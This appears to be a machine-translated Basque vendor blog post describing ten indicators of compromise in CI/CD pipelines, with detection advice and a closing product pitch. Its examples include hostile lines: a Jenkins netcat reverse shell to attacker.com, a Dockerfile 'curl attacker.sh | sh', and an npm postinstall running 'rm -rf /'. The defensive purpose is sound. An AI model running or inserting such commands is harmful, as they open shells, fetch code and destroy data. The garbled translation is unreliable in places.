Konpromisoaren 10 adierazle nagusiak CI/CD Pipelines

Sarrera: Zeintzuk dira zibersegurtasunean konpromisoaren adierazleak?

Konpromisoaren adierazleak zure sistemak edo pipeline erasopean egon daiteke. Hitz gutxitan esanda, konpromisoaren adierazleak. erasotzaileek utzitako arrastoak dira, arraroak bezala loginak, fitxategien aldaketak edo ezkutuko malwarea. Barruan KOIren zibersegurtasuna, krimen-eszena batean hatz-marken antzera jokatzen dute, zerbait gaizki dagoela frogatzen dizutelako. Beraz, garatzaileek galdetzen dutenean zeintzuk dira konpromisoaren adierazleak, erantzuna ez dago zerbitzarietara edo suebakietara mugatuta, gaur egungoetan ezkutatuta dauden arriskuak ere barne hartzen ditu CI/CD pipelines.

Horietan pipelineerasotzaileek kodea aldatu, mendekotasun gaiztoak txertatu edo eraikuntza-urratsak alda ditzakete oharkabean. Hala ere, gida gehienek zerbitzarietan edo sareetan bakarrik jartzen dute arreta oraindik. Ondorioz, softwarearen hornikuntza-katea helburu errazenetako bat bihurtu da.

Horregatik, konpromisoaren adierazleak aurkitzea CI/CD pipelines ezinbestekoa da. Batez ere, taldeei malwarea blokeatzen, sekretuak babesten eta softwarearen entregaren urrats guztiak ziurtatzen laguntzen die.

Konpromisoaren 10 adierazle nagusiak CI/CD Pipelines

Konpromisoaren adierazleak azaltzerakoan, zerrenda gehienek zerbitzarietan edo sareetan jartzen dute arreta. Hala ere, CI/CD pipelineErasotzaileek oso hatz-marka desberdinak uzten dituzte. Seinale hauek ezagutzea ezinbestekoa da defentsa proaktiboa egiteko. Jarraian, garatzaile eta segurtasun-ingeniari guztiek kontuan hartu beharko lituzketen 10 IOC zibersegurtasun-seinale gorriak daude.

1. Mendekotasun-aldaketa susmagarriak

Konpromisoaren adierazle nagusietako bat pipelines bat-bateko eta arraro mendekotasun eguneratzea da. Erasotzaileek askotan garatzaileek pakete kudeatzaileetan duten konfiantza erabiltzen dute pakete arriskutsuak gehitzeko.

Adibidez, npm batean package.json diff-ek bat-batean honako hauek izan ditzake:

Aldaketa horiek seguruak dirudite, baina troiar kodea txertatu dezakete eraikuntza guztietan.

eragina: Eraikuntza kaltetuek malwarea jatorrian heredatzen dute.

Detekzioa: mendekotasunen berrikuspenak betearazi, blokeo-fitxategien desberdintasunak jarraitu eta pakete berriak etengabe eskaneatu.

2. Kode nahasia eraikuntzan 

Malwarearen egileek nahasmendua erabiltzen dute berrikuspenak saihesteko. Ondorioz, konpromisoaren adierazle hau CI/CD pipelines harrapatzeko zailenetako bat izan daiteke. Izan ere, nahasitako kargak askotan kode irekiko liburutegietan edo edukiontzi irudietan sartzen dira oharkabean.

Adibidez:

  • PyPI pakete bat erabiliz base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Docker irudi bat, beharrezkoak ez diren UPX binarioekin betea.
  • JavaScript beteta. \x41\x42 kredentzial lapurrak ezkutatzetik ihes egiten du.

eragina: Kode ezkutua isilean exekutatzen da eraikitzean edo exekuzio-garaian, eta horrek seinale kritiko bihurtzen du IOCren zibersegurtasunean.
Detekzioa: Konbinatu SAST kodetutako edo paketatutako kodea markatzeko malware eskaneatzearekin. Batez ere, nahastea ikerketa gehiago merezi duen seinale gorri gisa hartu.

3. Git-en agerian dauden sekretuak: IOCren zibersegurtasun arrisku klasiko bat

CI/CD pipelines-ek askotan sekretuak zuzenean biltegietatik heredatzen dituzte. Hala ere, sekretuak Git-en agertzen direnean, "zeintzuk dira konpromisoaren adierazleak" galderari erantzun argienetako bat bihurtzen dira pipelines?” Kredentzialak Git-en iristen direnean, erasotzaileek mugagabe ustia ditzakete.

Adibidez:

  • A .env duen fitxategia AWS_SECRET_KEY=.
  • Tokenak sartu dira config.json.
  • Sekretuak oraindik ikusgai daude Git historian kendu ondoren ere.

eragina: Giltza agerian utziek erasotzaileei sarbide zuzena ematen diete CI/CD pipelines, hodeiko sistemak edo datu-baseak. Beraz, hau da konpromisoaren adierazle arriskutsuenetako bat.
Detekzioa: Erabili pre-commit hooks eta CI lanak eskaneatzeko sekretuetarako, eta ihes egindako gakoak berehala ezeztatu. Gainera, konponketa automatizatua aplikatu esposizio-leihoak murrizteko.

4. Manipulatua Pipeline Konfigurazioak: Konpromisoaren adierazle ezkutuak

Pipeline konfigurazioak helburu baliotsuak dira, zeren eta aldaketa bakar batek askotan lan-fluxu osoa bahitzen duOndorioz, manipulatuta pipeline fitxategiak IOCren zibersegurtasun arrisku nagusia dira, eta ohiko monitorizazio tresnak gutxitan detektatzen dituzte.

Adibidez:

  • GitHub-eko ekintzetan:

  • GitLab-en: lan gaizto bat gehitu da .gitlab-ci.yml datu sentikorrak botatzen dituena.
  • Jenkinsengan: sh "nc -e /bin/bash attacker.com 4444".

eragina: Onartu gabeko aldaketa hauek zure... pipeline erasotzaileentzako atzealdeko ate iraunkor batean, eta hori argi eta garbi konpromisoaren adierazle gisa balio du.
Detekzioa: Betearazi sinatutako konfigurazioak, eskatu PR onarpenak eta kontrolatu ustekabeko lanak. Horrez gain, ezarri guardrails aldatutako lan-fluxuak automatikoki blokeatzen dituztenak.

5. Pribilegiatuak IaC Lehenetsiak 

Gaizki konfiguratutako azpiegituren definizioek askotan atzeko ate ezkutuak sortzen dituzte. Ondorioz, lehenetsitako pribilegioak IaC COIren zibersegurtasun arrisku klasiko bat dira.

Adibidez:

  • Kubernetes inplementazio batek pod-ak ematen ditu privileged: true.
  • Helm grafikoak zerbitzuak erakusten ditu 0.0.0.0:22.

eragina: Erasotzaileek root mailako sarbidea lortzen dute edo barne zerbitzuak publikoki erakusten dituzte. Ondorioz, arazo hauek eraso-azalera nabarmen zabaltzen dute.
Detekzioa: Aplikatu IaC eskaneatzea batu aurretik pribilegio gutxienekin betearazteko. Gainera, ziurtatu konfigurazio guztiak berrikusten direla prozesuaren barruan. pipeline.

6. Eraikuntza-jokabide ezohikoak 

Erasotzaileek askotan aldatzen dute pipeline portaera ekintza gaiztoetan sartzeko. Beste era batera esanda, eraikuntza-jarduera ezohikoa da konpromisoaren adierazle diren erantzun argienetako bat CI/CD pipelines.

Adibidez:

  • Domeinu ezezagunetara sareko irteerako eskaerak egiten dituzten eraikuntzak.
  • Node.js proiektu batek bat-batean PowerShell sortzen du npm install.
  • CI lan batek eraikuntza-gidoietan definituta ez dauden binario handiak deskargatzen ditu.

eragina: Konprometitutako eraikuntzak malware banaketa puntu gisa joka dezakete. Batez ere, karga gaiztoak zabaltzen dituzte inplementazio guztietan.
Detekzioa: Kontrolatu eraikuntza-erregistroak ustekabeko prozesu edo konexioen bila. Gainera, konfiguratu anomalia-detekzioa arautik kanpoko portaerak markatzeko.

7. Pakete gaiztoen scriptak IOCren zibersegurtasun arrisku gisa

Pakete kudeatzaileek bizi-zikloa laguntzen dute hooks erasotzaileek ustiatzen dutena. Beraz, npm, PyPI edo Dockerfiles-eko script gaiztoak arriskuan dauden adierazle sendoak dira.

Adibidez:

  • npm: postinstall exekutatzen ari den script-a rm -rf / edo C2 batera balizatzea.
  • PyPI: setup.py Python kode ezkutua exekutatzea instalazioan.
  • Dockerfitxategia: RUN curl attacker.sh | sh.

eragina: Erasoa instalazioan zehar exekutatzen da, exekuzio-probak egin aurretik. Ondorioz, garatzaileek ez dute ohartuko beranduegi izan arte.
Detekzioa: Eskaneatu paketeen manifestuak instalazio-gidoien bila. Gainera, mugatu arriskutsuak direnak hooks in CI/CD esposizioa murrizteko lanpostuak.

8. Erregistroaren intoxikazio-adierazleak, konpromisoaren adierazleak

Erasotzaileek erregistroetako artefaktuak ordezkatu edo aldatzen dituzte, eta gertaera hauek hornidura-katean arriskuak dauden adierazleen adibide arruntak dira. pipelines.

Adibidez:

  • Docker irudi-etiketa bat isilean eguneratu da troiar geruza batekin.
  • Barne pakete bat bertsio pozoitsu batekin ordezkatu da.
  • npm izen-espazio okupazioa, adibidez lodash-proxy.

eragina: Erregistroko artefaktua erabiltzen duen eraikuntza oro arriskuan jartzen da. Ez hori bakarrik, baizik eta arriskua beheranzko zerbitzuetara hedatzen da.
Detekzioa: Bete sinadura eta osotasun egiaztapenak erregistroko erauzketa guztietan. Gainera, jarraitu artefaktuen jatorria honekin: SBOM baliozkotzea.

9. Erabiltzaileen jarduera anomaloa IOCren froga gisa

Kontu kaltetuek ia beti uzten dituzte arrasto anormalak atzean. Horrenbestez, garatzaileen portaera ezohikoa konpromisoaren adierazle sendoa da.

Adibidez:

  • Committokiko goizeko 3etan bultzatu da.
  • Oporretan dauden kontuen PR onarpenak.
  • Pipelinemaiztasun ezohikoarekin abiarazten da.

eragina: Erasotzaileek lapurtutako kredentzialak erabiltzen dituzte aldaketa gaiztoak txertatzeko. Azken finean, baimenik gabeko commiterraz integratzen dira ohiko lan-fluxuetan.
Detekzioa: Ikuskatu SCM jarduera anomalien bila, MFA betearazi eta tokenak aldizka txandakatu. Gainera, susmagarrien berri eman commit edo onespen ereduak.

10. IOCren zibersegurtasunean osotasun edo sinadura egiaztapenen hutsegitea

Ohikoa baina baztertua konpromisoaren adierazle. osotasun edo sinadura egiaztapen huts bat da. IOC zibersegurtasunean, egiaztapen hauek kodea edo artefaktuak benetakoak direla egiaztatzen dute. Saltatzeak uzten du pipelineagerian dago.

Adibideak:

  • SHA256 hash bat ez dator bat espero zen kontrol-baturarekin.
  • GPG sinadura falta edo baliogabea.
  • An SBOM sinatu gabeko artefaktuak erakusten.

eragina: Integritate-akatsek askotan manipulazioa, erregistroko pozoitzea edo malware injekzioa esan nahi dute.

Detekzioa: Automatizatu sinadura-egiaztapenak, betearazi kontrol-baturaren balidazioa eta blokeatu sinatu gabeko osagaiak. Batez ere, hartu huts egiten duen egiaztapen bakoitza konpromisoaren froga argi gisa.

CI/CD Konpromisoaren adierazleak begirada batean

Konpromisoaren Adierazlea (KOA) Inpaktua CI/CD Pipelines Nola detektatu
Mendekotasun Aldaketa Susmagarriak Erasotzaileek liburutegi gaiztoak txertatzen dituzte pakete kudeatzaileetan, eta horrek eraikuntzak arriskuan jartzea dakar. Blokeo-fitxategien desberdintasunak jarraitu, mendekotasunen berrikuspenak betearazi eta mendekotasunak etengabe eskaneatu.
Kode nahasia eraikuntzan Ezkutuko kargak eraikuntzan edo exekuzio-garaian exekutatzen dira detektatu gabe. Erabili SAST eta malware eskaneatzea base64, hex edo kode paketatuaren ereduak markatzeko.
Sekretuak Git-en agerian Token edo API gako filtratuek erasotzaileei sistema kritikoetarako sarbide zuzena ematen diete. Exekutatu eskaneatze sekretuak Git-en hooks eta automatikoki ezeztatu filtratutako kredentzialak.
Manipulatua Pipeline Konfigurazioak Lan-fluxu aldatuek datuak barruan kanporatzea edo iraunkortasuna ahalbidetzen dute CI/CD. Eskatu PR onarpenak, betearazi sinatutako konfigurazioak eta kontrolatu pipeline aldaketak.
Pribilegiatu IaC Lehenetsiak Rol permisiboegiek edo lehenespen ez-seguruek hodeiko inguruneak agerian uzten dituzte. Eskaneatu Terraform, Kubernetes eta Helm fitxategiak pribilegio gutxienen betearazpena egiaztatzeko.
Eraikuntza-jokabide ezohikoak Pipelinemalware banaketa puntu gisa edo alboko mugimendurako erabiltzen dira. Aztertu eraikuntza-erregistroak ustekabeko deskargak, prozesuak edo irteerako deiak bilatzeko.
Pakete gaiztoen scriptak Instalazio aurreko/osteko ezkutuko scriptek exekuzio-denbora probak egin aurretik kargak abiarazten dituzte. Blokeatu arriskutsuak diren npm/PyPI scriptak eta mugatu exekuzioa CI/CD lanpostu.
Erregistroko intoxikazioa Troiar bihurtutako artefaktuek erregistroetako irudi edo fitxategi bitarren ordez balio dute. Egiaztatu kontrol-baturak, betearazi sinaduraren balidazioa eta eskaneatu erregistroak proaktiboki.
Erabiltzailearen jarduera anomaloa Kontu konprometituek gaiztakeria bultzatzen dute commits edo abiarazlea pipelines. Betearazi MFA, kontrolatu commitanomaliak bilatzeko eta aztertu login ereduak.
Osotasun edo sinadura egiaztapenetan huts egin du Kode, mendekotasun edo irudi manipulatuak sartzen direla adierazten du. pipeline. Automatizatu osotasun-egiaztapenak eta blokeatu sinatu gabeko edo bat ez datozen osagaiak.

Zergatik huts egiten duen IOCren zibersegurtasun tradizionalak CI/CD Arriskuak

Erakunde gehienek zerbitzarietan, ordenagailuetan edo sareetan arriskuan dauden adierazleak kontrolatzen dituzte dagoeneko. Hala ere, IOCren zibersegurtasunerako ikuspegi klasiko honek alde batera uzten ditu CI/CD pipelines, erasotzeko gainazal kritikoenetako bat direnak orain. Izan ere, pipelines-ek tresna tradizionalek detektatu ezin dituzten konpromiso-seinale bereziak erakusten dituzte.

Segurtasun Tradizionalean Konpromisoaren Adierazleak

Ohiko IOCren zibersegurtasunean, arreta normalean honako hauetan jartzen da:

  • Ezohiko loginlapurtutako kredentzialak iradokitzen dituzten s edo IP helbideak.
  • Malwarea agerian uzten duten fitxategi-hash susmagarriak edo erregistroko aldaketak.
  • Datuen esfiltrazioa adierazten duen ustekabeko irteerako trafikoa.

Adierazle ezagunak dira hauek, baita ere jarraipena egiten zaienak MITRE ATT&CK esparrua, aurkarien portaera eta taktika ohikoenak mapatzen dituena. Seinale erabilgarriak dira. Hala ere, batez ere sistema eragileei edo enpresa-sareei aplikatzen zaizkie. Ondorioz, softwarearen hornikuntza-katean lehenago gertatzen den manipulazio sotila galtzen dute.

Zergatik CI/CD PipelineDesberdinak dira

CI/CD pipelines ingurune automatizatuak dira, non garatzaileek commit kodea, mendekotasunak ateratzea eta bertsioak kaleratzea. Erasotzaileek badakite hemengo konpromiso bat inplementazio guztietan zehar gertatzen dela. Horrenbestez, zeintzuk dira konpromisoaren adierazleak CI/CD pipelineOso desberdinak dirudite:

  • Isilpean gehitutako mendekotasun gaiztoa package.json edo requirements.txt fitxategira.
  • Git-en agerian dauden API gakoak edo tokenak commits edo .env fitxategiak.
  • npm edo PyPI paketeetan injektatutako kode nahasia.
  • Terraform edo Kubernetes fitxategiak, lehenespen ez-seguruak dituztenak, hala nola pribilegiatua: egia.
  • Pipeline lanak datuak ateratzeko edo atzeko ateak irekitzeko editatuta.

Konpromiso-seinale hauek CI/CD ikusezin geratu standard segurtasun tresnak.

IOCren zibersegurtasuneko hutsunea

Talde askok konpromiso-adierazleen balioa ulertzen duten arren, zerbitzarien eta sareko erregistroen detekzioan bakarrik oinarritzen dira oraindik. Hori dela eta, erasotzaileek build-ak pozoitu edo malwarea txertatu dezakete ohiko arrastoak utzi gabe. Horregatik, XZ Utils atzeko atea edo npm pakete gaiztoak bezalako gertakariak ez ziren detektatu ekoizpenera iritsi arte.

Hornikuntza-katearen konpromiso mota hauek ere nabarmentzen dira CISA-ren hornidura-katearen segurtasun-gida, erasotzaileek gero eta gehiago jomugan dituztela ohartarazten duena CI/CD pipelines eta erregistroak.

Eramateko du

KOIren zibersegurtasun tradizionala beharrezkoa da, baina ez da nahikoa. Batez ere, taldeek konpromisoaren adierazleak antzeman behar dituzte. CI/CD pipelines. Orduan bakarrik detektatu dezakete kode gaiztoa edo pipeline tratu txarrak ingurune guztietan zabaldu aurretik.

sca-tools-software-konposizio-analisi-tresnak
Lehentasuna eman, konpondu eta babestu zure software arriskuak
Lortu zure doako kontua.
Ez da beharrezkoa kreditu txartelik.

Ziurtatu zure softwarearen garapena eta entrega

Xygeni produktu multzoarekin